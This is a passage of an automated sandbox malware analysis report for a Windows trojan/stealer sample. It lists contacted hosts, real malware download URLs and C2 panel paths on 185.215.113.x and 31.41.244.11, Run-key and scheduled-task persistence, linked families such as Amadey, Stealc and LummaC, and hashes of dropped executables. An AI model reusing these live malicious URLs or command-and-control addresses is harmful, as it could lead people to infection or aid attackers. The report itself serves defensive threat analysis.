https://monitor.firefox.com/user/preferences	firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	false		high
https://screenshots.firefox.com/	firefox.exe, 0000001C.00000002.3010463460.000001DEEAA10000.00000002.08000000.00040000.00000000.sdmp	false		high
https://gpuweb.github.io/gpuweb/	firefox.exe, 0000001C.00000003.2896162189.000001DEF6989000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2755113615.000001DEF6989000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.16/steam/random.exeC	a6f0d09f38.exe, 0000000D.00000002.2960178454.00000000012AC000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2894772771.00000000012AA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://firefox-source-docs.mozilla.org/remote/Security.html	firefox.exe, 0000001C.00000002.3019407940.000001DEEAD3A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/tracking-content-report	firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	false		high
https://vk.com/	firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp	false		high
http://31.41.244.11/files/6802601040/SxQyhJr.exe	skotes.exe, 00000006.00000002.2957851747.0000000000E9B000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2957851747.0000000000EEE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://watch.sling.com/	firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/google/closure-compiler/issues/3177	firefox.exe, 0000001C.00000003.2758502866.000001DEF6A39000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2755113615.000001DEF69B4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2756128256.000001DEF6A35000.00000004.00000800.00020000.00000000.sdmp	false		high
https://stackoverflow.com/q/2152978/23354	SxQyhJr.exe, 00000007.00000002.2452626823.0000000006300000.00000004.08000000.00040000.00000000.sdmp	false		high
https://webextensions.settings.services.mozilla.com/v1	firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	false		high
https://github.com/lit/lit/blob/main/packages/reactive-element/src/decorators/query-all.ts	firefox.exe, 0000001C.00000003.2757888538.000001DEF6A28000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2758502866.000001DEF6A31000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2828014808.000001DEF6A28000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2825634807.000001DEF6A30000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/firefox-relay-integration	firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	false		high
https://bugzilla.mozilla.org/show_bug.cgi?id=1238180Stale	firefox.exe, 0000001C.00000002.3019407940.000001DEEADAA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://addons.mozilla.org/%LOCALE%/firefox/	firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	false		high
https://www.avito.ru/	firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp	false		high
https://spocs.getpocket.com	firefox.exe, 0000001C.00000003.2900139173.000001DEF6967000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2891825991.000001DEF7090000.00000004.00000800.00020000.00000000.sdmp	false		high
https://developers.google.com/safe-browsing/v4/advisory	firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	false		high
https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881	firefox.exe, 0000001C.00000002.2978589406.000001DEDEB11000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3019407940.000001DEEAD03000.00000004.00000800.00020000.00000000.sdmp	false		high
http://poczta.interia.pl/mh/?mailto=%s	firefox.exe, 0000001C.00000002.3003513879.000001DEEA97D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp	false		high
https://smartblock.firefox.etp/play.svg	firefox.exe, 0000001C.00000002.3019407940.000001DEEAD03000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
185.215.113.43	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
34.149.100.209	prod.remote-settings.prod.webservices.mozgcp.net	United States	2686	ATGS-MMD-ASUS	false
185.215.113.16	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	false
34.107.243.93	push.services.mozilla.com	United States	15169	GOOGLEUS	false
34.107.221.82	prod.detectportal.prod.cloudops.mozgcp.net	United States	15169	GOOGLEUS	false
18.208.8.205	httpbin.org	United States	14618	AMAZON-AESUS	false
35.244.181.201	prod.balrog.prod.cloudops.mozgcp.net	United States	15169	GOOGLEUS	false
34.117.188.166	contile.services.mozilla.com	United States	139070	GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	false
185.215.113.206	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
104.21.16.9	atten-supporse.biz	United States	13335	CLOUDFLARENETUS	false
35.190.72.216	prod.classify-client.prod.webservices.mozgcp.net	United States	15169	GOOGLEUS	false
142.250.181.78	youtube.com	United States	15169	GOOGLEUS	false
34.160.144.191	prod.content-signature-chains.prod.webservices.mozgcp.net	United States	2686	ATGS-MMD-ASUS	false
34.120.208.123	telemetry-incoming.r53-2.services.mozilla.com	United States	15169	GOOGLEUS	false
31.41.244.11	unknown	Russian Federation	61974	AEROEXPRESS-ASRU	false

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1565518
Start date and time:	2024-11-30 04:04:06 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 11m 15s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	35
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@53/34@58/16
EGA Information:	Successful, ratio: 37.5%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 34.209.229.249, 52.32.237.164, 52.27.142.243
Excluded domains from analysis (whitelisted): fs.microsoft.com, shavar.prod.mozaws.net, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, incoming.telemetry.mozilla.org, ctldl.windowsupdate.com, detectportal.prod.mozaws.net, aus5.mozilla.org, location.services.mozilla.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target AppLaunch.exe, PID 2720 because it is empty
Execution Graph export aborted for target b5da647ae3.exe, PID 5500 because there are no executed function
Execution Graph export aborted for target file.exe, PID 7412 because it is empty
Execution Graph export aborted for target skotes.exe, PID 7572 because there are no executed function
Execution Graph export aborted for target skotes.exe, PID 7696 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
03:04:59	Task Scheduler	Run new task: skotes path: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
03:06:26	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run a6f0d09f38.exe C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe
03:06:47	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run b5da647ae3.exe C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe
03:07:07	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 6e1fbaaba5.exe C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe
22:06:01	API Interceptor	60134x Sleep call for process: skotes.exe modified
22:06:25	API Interceptor	61x Sleep call for process: a6f0d09f38.exe modified
22:06:46	API Interceptor	1x Sleep call for process: firefox.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.215.113.43	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Cryptbot, LummaC Stealer, Nymaim, Xmrig	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Nymaim, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Cryptbot, LummaC Stealer, Nymaim, Stealc	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, AsyncRAT, Cryptbot, DcRat, LummaC Stealer, Nymaim, Stealc	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
34.149.100.209	file.exe	Get hash	malicious	Credential Flusher	Browse
	file.exe	Get hash	malicious	Credential Flusher	Browse
	file.exe	Get hash	malicious	Credential Flusher	Browse
	file.exe	Get hash	malicious	Credential Flusher	Browse
	file.exe	Get hash	malicious	Credential Flusher	Browse
	file.exe	Get hash	malicious	Credential Flusher	Browse
	file.exe	Get hash	malicious	Credential Flusher	Browse
	file.exe	Get hash	malicious	Credential Flusher	Browse
	file.exe	Get hash	malicious	Credential Flusher	Browse
	file.exe	Get hash	malicious	Credential Flusher	Browse
185.215.113.16	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.16/luma/random.exe
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.16/mine/random.exe
	file.exe	Get hash	malicious	LummaC Stealer	Browse	185.215.113.16/off/def.exe
	file.exe	Get hash	malicious	Amadey, Cryptbot, LummaC Stealer, Nymaim, Xmrig	Browse	185.215.113.16/luma/random.exe
	file.exe	Get hash	malicious	LummaC Stealer	Browse	185.215.113.16/off/def.exe
	file.exe	Get hash	malicious	Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Nymaim, Stealc, Vidar	Browse	185.215.113.16/off/random.exe
	file.exe	Get hash	malicious	LummaC Stealer	Browse	185.215.113.16/off/def.exe
	file.exe	Get hash	malicious	LummaC Stealer	Browse	185.215.113.16/off/def.exe
	file.exe	Get hash	malicious	Amadey, Cryptbot, LummaC Stealer, Nymaim, Stealc	Browse	185.215.113.16/well/random.exe
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.16/mine/random.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
prod.remote-settings.prod.webservices.mozgcp.net	file.exe	Get hash	malicious	Credential Flusher	Browse	34.149.100.209
	file.exe	Get hash	malicious	Credential Flusher	Browse	34.149.100.209
	file.exe	Get hash	malicious	Credential Flusher	Browse	34.149.100.209
	file.exe	Get hash	malicious	Credential Flusher	Browse	34.149.100.209
	file.exe	Get hash	malicious	Credential Flusher	Browse	34.149.100.209
	file.exe	Get hash	malicious	Credential Flusher	Browse	34.149.100.209
	file.exe	Get hash	malicious	Credential Flusher	Browse	34.149.100.209
	file.exe	Get hash	malicious	Credential Flusher	Browse	34.149.100.209
	file.exe	Get hash	malicious	Credential Flusher	Browse	34.149.100.209
	file.exe	Get hash	malicious	Credential Flusher	Browse	34.149.100.209
example.org	file.exe	Get hash	malicious	Credential Flusher	Browse	93.184.215.14
	file.exe	Get hash	malicious	Credential Flusher	Browse	93.184.215.14
	file.exe	Get hash	malicious	Credential Flusher	Browse	93.184.215.14
	file.exe	Get hash	malicious	Credential Flusher	Browse	93.184.215.14
	file.exe	Get hash	malicious	Credential Flusher	Browse	93.184.215.14
	file.exe	Get hash	malicious	Credential Flusher	Browse	93.184.215.14
	file.exe	Get hash	malicious	Credential Flusher	Browse	93.184.215.14
	file.exe	Get hash	malicious	Credential Flusher	Browse	93.184.215.14
	file.exe	Get hash	malicious	Credential Flusher	Browse	93.184.215.14
	file.exe	Get hash	malicious	Credential Flusher	Browse	93.184.215.14
star-mini.c10r.facebook.com	file.exe	Get hash	malicious	Credential Flusher	Browse	157.240.196.35
	file.exe	Get hash	malicious	Credential Flusher	Browse	157.240.196.35
	file.exe	Get hash	malicious	Credential Flusher	Browse	157.240.196.35
	file.exe	Get hash	malicious	Credential Flusher	Browse	157.240.196.35
	file.exe	Get hash	malicious	Credential Flusher	Browse	157.240.196.35
	file.exe	Get hash	malicious	Credential Flusher	Browse	157.240.195.35
	file.exe	Get hash	malicious	Credential Flusher	Browse	157.240.196.35
	file.exe	Get hash	malicious	Credential Flusher	Browse	157.240.196.35
	file.exe	Get hash	malicious	Credential Flusher	Browse	157.240.196.35
	file.exe	Get hash	malicious	Credential Flusher	Browse	157.240.196.35
dyna.wikimedia.org	file.exe	Get hash	malicious	Credential Flusher	Browse	185.15.58.224
	file.exe	Get hash	malicious	Credential Flusher	Browse	185.15.58.224
	file.exe	Get hash	malicious	Credential Flusher	Browse	185.15.58.224
	file.exe	Get hash	malicious	Credential Flusher	Browse	185.15.58.224
	file.exe	Get hash	malicious	Credential Flusher	Browse	185.15.58.224
	file.exe	Get hash	malicious	Credential Flusher	Browse	185.15.58.224
	file.exe	Get hash	malicious	Credential Flusher	Browse	185.15.58.224
	file.exe	Get hash	malicious	Credential Flusher	Browse	185.15.58.224
	file.exe	Get hash	malicious	Credential Flusher	Browse	185.15.58.224
	file.exe	Get hash	malicious	Credential Flusher	Browse	185.15.58.224
twitter.com	file.exe	Get hash	malicious	Credential Flusher	Browse	104.244.42.193
	file.exe	Get hash	malicious	Credential Flusher	Browse	104.244.42.65
	file.exe	Get hash	malicious	Credential Flusher	Browse	104.244.42.1
	file.exe	Get hash	malicious	Credential Flusher	Browse	104.244.42.193
	file.exe	Get hash	malicious	Credential Flusher	Browse	104.244.42.1
	file.exe	Get hash	malicious	Credential Flusher	Browse	104.244.42.193
	file.exe	Get hash	malicious	Credential Flusher	Browse	104.244.42.129
	file.exe	Get hash	malicious	Credential Flusher	Browse	104.244.42.1
	file.exe	Get hash	malicious	Credential Flusher	Browse	104.244.42.1
	file.exe	Get hash	malicious	Credential Flusher	Browse	104.244.42.1

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AMAZON-AESUS	file.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	18.213.123.165
	file.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	18.208.8.205
	file.exe	Get hash	malicious	Amadey, Cryptbot, LummaC Stealer, Nymaim, Xmrig	Browse	18.208.8.205
	file.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	18.208.8.205
	file.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	18.208.8.205
	file.exe	Get hash	malicious	Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Nymaim, Stealc, Vidar	Browse	18.208.8.205
	file.exe	Get hash	malicious	Amadey, Cryptbot, LummaC Stealer, Nymaim, Stealc	Browse	18.208.8.205
	file.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	18.208.8.205
	file.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	18.213.123.165
	file.exe	Get hash	malicious	Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	18.208.8.205
WHOLESALECONNECTIONSNL	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.206
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC Stealer	Browse	185.215.113.16
	file.exe	Get hash	malicious	Amadey, Cryptbot, LummaC Stealer, Nymaim, Xmrig	Browse	185.215.113.16
	newtpp.exe	Get hash	malicious	Xmrig	Browse	185.215.113.66
	file.exe	Get hash	malicious	LummaC Stealer	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Nymaim, Stealc, Vidar	Browse	185.215.113.206
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.43
ATGS-MMD-ASUS	file.exe	Get hash	malicious	Credential Flusher	Browse	34.160.144.191
	file.exe	Get hash	malicious	Credential Flusher	Browse	34.160.144.191
	file.exe	Get hash	malicious	Credential Flusher	Browse	34.160.144.191
	file.exe	Get hash	malicious	Credential Flusher	Browse	34.160.144.191
	file.exe	Get hash	malicious	Credential Flusher	Browse	34.160.144.191
	file.exe	Get hash	malicious	Credential Flusher	Browse	34.160.144.191
	file.exe	Get hash	malicious	HackBrowser, Xmrig	Browse	34.160.111.145
	file.exe	Get hash	malicious	Credential Flusher	Browse	34.160.144.191
	file.exe	Get hash	malicious	Credential Flusher	Browse	34.160.144.191
	file.exe	Get hash	malicious	Credential Flusher	Browse	34.160.144.191
WHOLESALECONNECTIONSNL	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.206
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC Stealer	Browse	185.215.113.16
	file.exe	Get hash	malicious	Amadey, Cryptbot, LummaC Stealer, Nymaim, Xmrig	Browse	185.215.113.16
	newtpp.exe	Get hash	malicious	Xmrig	Browse	185.215.113.66
	file.exe	Get hash	malicious	LummaC Stealer	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Nymaim, Stealc, Vidar	Browse	185.215.113.206
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.43

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.16.9
	ONHQNHFT.msi	Get hash	malicious	Unknown	Browse	104.21.16.9
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.16.9
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.16.9
	RezQY7jWu8.exe	Get hash	malicious	XRed	Browse	104.21.16.9
	file.exe	Get hash	malicious	Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Nymaim, Stealc, Vidar	Browse	104.21.16.9
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.16.9
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.16.9
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.16.9
	file.exe	Get hash	malicious	Amadey, Cryptbot, LummaC Stealer, Nymaim, Stealc	Browse	104.21.16.9
fb0aa01abe9d8e4037eb3473ca6e2dca	file.exe	Get hash	malicious	Credential Flusher	Browse	35.244.181.201 34.160.144.191 34.120.208.123
	file.exe	Get hash	malicious	Credential Flusher	Browse	35.244.181.201 34.160.144.191 34.120.208.123
	file.exe	Get hash	malicious	Credential Flusher	Browse	35.244.181.201 34.160.144.191 34.120.208.123
	file.exe	Get hash	malicious	Credential Flusher	Browse	35.244.181.201 34.160.144.191 34.120.208.123
	file.exe	Get hash	malicious	Credential Flusher	Browse	35.244.181.201 34.160.144.191 34.120.208.123
	file.exe	Get hash	malicious	Credential Flusher	Browse	35.244.181.201 34.160.144.191 34.120.208.123
	file.exe	Get hash	malicious	Credential Flusher	Browse	35.244.181.201 34.160.144.191 34.120.208.123
	file.exe	Get hash	malicious	Credential Flusher	Browse	35.244.181.201 34.160.144.191 34.120.208.123
	file.exe	Get hash	malicious	Credential Flusher	Browse	35.244.181.201 34.160.144.191 34.120.208.123
	file.exe	Get hash	malicious	Credential Flusher	Browse	35.244.181.201 34.160.144.191 34.120.208.123

Process:	C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	226
Entropy (8bit):	5.360398796477698
Encrypted:	false
SSDEEP:	6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTv:Q3La/KDLI4MWuPTAv
MD5:	3A8957C6382192B71471BD14359D0B12
SHA1:	71B96C965B65A051E7E7D10F61BEBD8CCBB88587
SHA-256:	282FBEFDDCFAA0A9DBDEE6E123791FC4B8CB870AE9D450E6394D2ACDA3D8F56D
SHA-512:	76C108641F682F785A97017728ED51565C4F74B61B24E190468E3A2843FCC43615C6C8ABE298750AF238D7A44E97C001E3BE427B49900432F905A7CE114AA9AD
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\SxQyhJr[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1473536
Entropy (8bit):	7.937162817340063
Encrypted:	false
SSDEEP:	24576:XqgOt5BhqfWXUIue3QgJaCIPwHImKimJgWbqrD4cM9BysZODGcaXBjZrGxjf6sWI:XitThqRI3btvcimJ5bEDDMSsZ4GL3rGZ
MD5:	0F325C99B7B2585A266CF50D88F134C8
SHA1:	160551D6E6F35AB8AB7401AEC1B8ADC0BEA94EBC
SHA-256:	7851C601871D56B8DB41856E6DFB518F35332B5F59153FD960BA0A0E7D1A44D2
SHA-512:	C5D1F02C49BB98BE16C61D91E369DE31C8DD8EFC19DDFF702984B91DAA8FFB66E0E15C3BF76FF88D2297E7534238E89FB2F7F28B22F7B21AD90C496B5C51BF12
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 16%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....yJg................................. ... ....@.. ....................................`.................................d...W.... ............................................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc...............z..............@..B........................H.......d....x..........\|...............................................Fs....%o....o......s....}.....{.....o.....{....(....(....o......((....s...........()...F.o...r...po+....~....:....r...p.....(#...o3...s4........~.....~...........j(....r...p~....o5...t...."..}'...^.....b...b`..b`.`}'...r. ....n...bj`..bj`.j`m}'...f..(.....(.....(....s....f.(......(.....(....s....f.(.....(......(....s....f.(.....(.....(.....s....F.{'.....d ...._.F.{'.....d ...._.B.{'...

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2765824
Entropy (8bit):	6.472329089980284
Encrypted:	false
SSDEEP:	49152:m7sNQnouAeEI0+206WUmc17WSlt3fcgJRZc2Vbf:IGQouAeEXX03UTwSz3f22Vbf
MD5:	47AA764406BA64383AC50E4101F34474
SHA1:	48C14E56CC54EE0095C52A680D41B20E76DD3D2B
SHA-256:	0BB190F23AE3739409ED5FC96D03728CBB385A58FD544F4FB8A74AF959B2F72E
SHA-512:	D5D133CC90A1CD47255E6DB9487AE1FD8AFB7264DD084094D2DC3B782C9D0FFD783DE94FC650BAE49B20C0B1F5BC52DF5A777A99AD9D502DC0CC5700C82FF6D7
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 47%
Preview:	MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P(,e.........."...0..$.............. ...`....@.. ..............................:...`.................................U...i....`.............................................................................................................. . .@... ....... ..............@....rsrc........`.......2..............@....idata . ...........8..............@...xbmfzvhb..).......)..:..............@...ztggrlpz. ........................@....taggant.@......"....*.............@...................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1840128
Entropy (8bit):	7.946354570205017
Encrypted:	false
SSDEEP:	49152:iM4IR3PksYn/lXz5lEsNEJqgIY210WiJC:R3PVkA+qqyWi4
MD5:	BB0C42D0421512D8F7796F5253543456
SHA1:	8B3139E22E253ADC3B55D8743A7D4CC173AA567D
SHA-256:	29CA807F5372FED46F73A09B357BE9A41C7271307D273A20FE9045EEADCE65E8
SHA-512:	20B2775045AE808319BD5283E6812EE03A6B96FAF7A110B0246E43D8DE7132822DD8C0C1DF8D0516B7350A0FC5F4B862AF30807E3DBC875CFD2BBFEFC622934E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 39%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........8..k..k..k.'k..k..k..k.&k..k...k..k...k..k...j..k..k..k.#k..k..k..kRich..k........PE..L....Hg....................."........j...........@...........................j...........@.................................M.$.a.....$.......................$..................................................................................... . ..$......b..................@....rsrc.........$......r..............@....idata ......$......t..............@... .P+...$......v..............@...sqwnkuay......P..t...x..............@...dlrscmkp......j.....................@....taggant.0....j.."..................@...................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe

Download File

